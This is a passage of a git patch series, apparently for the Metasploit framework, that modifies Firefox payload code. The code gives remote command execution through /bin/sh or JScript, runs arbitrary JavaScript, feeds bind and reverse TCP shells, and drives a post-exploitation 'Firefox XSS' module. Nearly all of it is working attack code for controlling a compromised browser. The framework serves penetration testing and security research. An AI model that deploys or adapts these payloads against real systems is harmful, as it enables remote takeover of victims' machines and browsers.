       var windows = (ua.indexOf("Windows")>-1);
       var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
       var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
       var runCmd = function(cmd, cb) {
-        if (cmd.trim().length == 0) return;
+        cb = cb \|\| (function(){});
+
+        if (cmd.trim().length == 0) {
+          setTimeout(function(){ cb("Command is empty string ('')."); });
+          return;
+        }
 
         var js = (/^\\s*\\[JAVASCRIPT\\]([\\s\\S]*)\\[\\/JAVASCRIPT\\]/g).exec(cmd.trim());
         if (js) {
           var tag = "[!JAVASCRIPT]";
-          Function('send', js[1])(function(r){ if (r) cb(r+tag+"\\n"); });
+          var sync = true;  // avoid zalgo's reach
+          var sent = false;
+
+          var retVal = Function('send', js[1])(function(r){
+            if (sent) return;
+            sent = true
+            if (r) {
+              if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+              else      cb(false, r+tag+"\\n");
+            }
+          });
+
+          sync = false;
+
+          if (retVal && !sent) {
+            sent = true;
+            setTimeout(function(){ cb(false, retVal+tag+"\\n"); });
+          }
+
           return;
         }
 
@@ -116,13 +155,13 @@ module Msf::Payload::Firefox
           var args = [jscriptFile.path, b64];
           process.run(true, args, args.length);
           jscriptFile.remove(true);
-          cb(cmd+"\\n"+readFile(stdout.path));
+          setTimeout(function(){cb(false, cmd+"\\n"+readFile(stdout.path));});
         } else {
           sh.initWithPath("/bin/sh");
           process.init(sh);
           var args = ["-c", shell];
           process.run(true, args, args.length);
-          cb(readFile(stdout.path));
+          setTimeout(function(){cb(false, readFile(stdout.path));});
         }
       };
     |
diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb
index 0c59c12b3d..a333381bed 100644
--- a/modules/payloads/singles/firefox/shell_bind_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb
@@ -66,14 +66,13 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            runCmd(data, function(output) {
-              outStream.write(output, output.length);
+            runCmd(data, function(err, output) {
+              if(!err) outStream.write(output, output.length);
             });
           }
         };
       };
 
-      #{read_file_source}
       #{run_cmd_source}
 
       serverSocket.asyncListen(listener);
diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
index ecc889cfbb..2604fc9beb 100644
--- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb
@@ -51,13 +51,12 @@ module Metasploit3
           onStopRequest: function(request, context) {},
           onDataAvailable: function(request, context, stream, offset, count) {
             var data = NetUtil.readInputStreamToString(stream, count).trim();
-            runCmd(data, function(output) {
-              outStream.write(output, output.length);
+            runCmd(data, function(err, output) {
+              if (!err) outStream.write(output, output.length);
             });
           }
         };
 
-        #{read_file_source}
         #{run_cmd_source}
 
         pump.asyncRead(listener, null);
diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb
index cd6cc0b5da..993d3291b6 100644
--- a/modules/post/firefox/gather/xss.rb
+++ b/modules/post/firefox/gather/xss.rb
@@ -7,6 +7,9 @@ require 'msf/core'
 require 'json'
 
 class Metasploit3 < Msf::Post
+
+  include Msf::Payload::Firefox
+
   def initialize(info={})
     super(update_info(info,
       'Name'          => 'Firefox XSS',
@@ -47,6 +50,8 @@ class Metasploit3 < Msf::Post
     %Q|
 
       (function(send){
+        #{set_timeout_source}
+
         var hiddenWindow = Components.classes["@mozilla.org/appshell/appShellService;1"]
                                .getService(Components.interfaces.nsIAppShellService)
                                .hiddenDOMWindow;
@@ -60,9 +65,9 @@ class Metasploit3 < Msf::Post
         
         var evt = function() {
           if (hiddenWindow[key]) {
-            schedule(evt);
+            setTimeout(evt, 200);
           } else {
-            schedule(function(){
+            setTimeout(function(){
               try {
                 send(hiddenWindow.Function('send', src)(send));
               } catch (e) {
@@ -72,13 +77,7 @@ class Metasploit3 < Msf::Post
           }
         };
 
-        var schedule = function(cb, delay) {
-          var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
-          timer.initWithCallback({notify:cb}, delay\|\|200, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
-          return timer;
-        };
-
-        schedule(evt);
+        setTimeout(evt, 200);
       })(send);
 
     |.strip

From 7af8fe9cd114c5471f0058f8e2f993f939052180 Mon Sep 17 00:00:00 2001
From: Joe Vennix <joev@metasploit.com>
Date: Tue, 7 Jan 2014 16:23:24 -0600
Subject: [PATCH 24/24] Catch exceptions in an XSS script and return the error.

---
 lib/msf/core/payload/firefox.rb | 19 +++++++++++--------
 1 file changed, 11 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb
index 6bcbc75b89..3d3ae54f03 100644
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@@ -88,15 +88,18 @@ module Msf::Payload::Firefox
           var tag = "[!JAVASCRIPT]";
           var sync = true;  // avoid zalgo's reach
           var sent = false;
+          var retVal = null;
 
-          var retVal = Function('send', js[1])(function(r){
-            if (sent) return;
-            sent = true
-            if (r) {
-              if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
-              else      cb(false, r+tag+"\\n");
-            }
-          });
+          try {
+            retVal = Function('send', js[1])(function(r){
+              if (sent) return;
+              sent = true
+              if (r) {
+                if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
+                else      cb(false, r+tag+"\\n");
+              }
+            });
+          } catch (e) { retVal = e.message; }
 
           sync = false;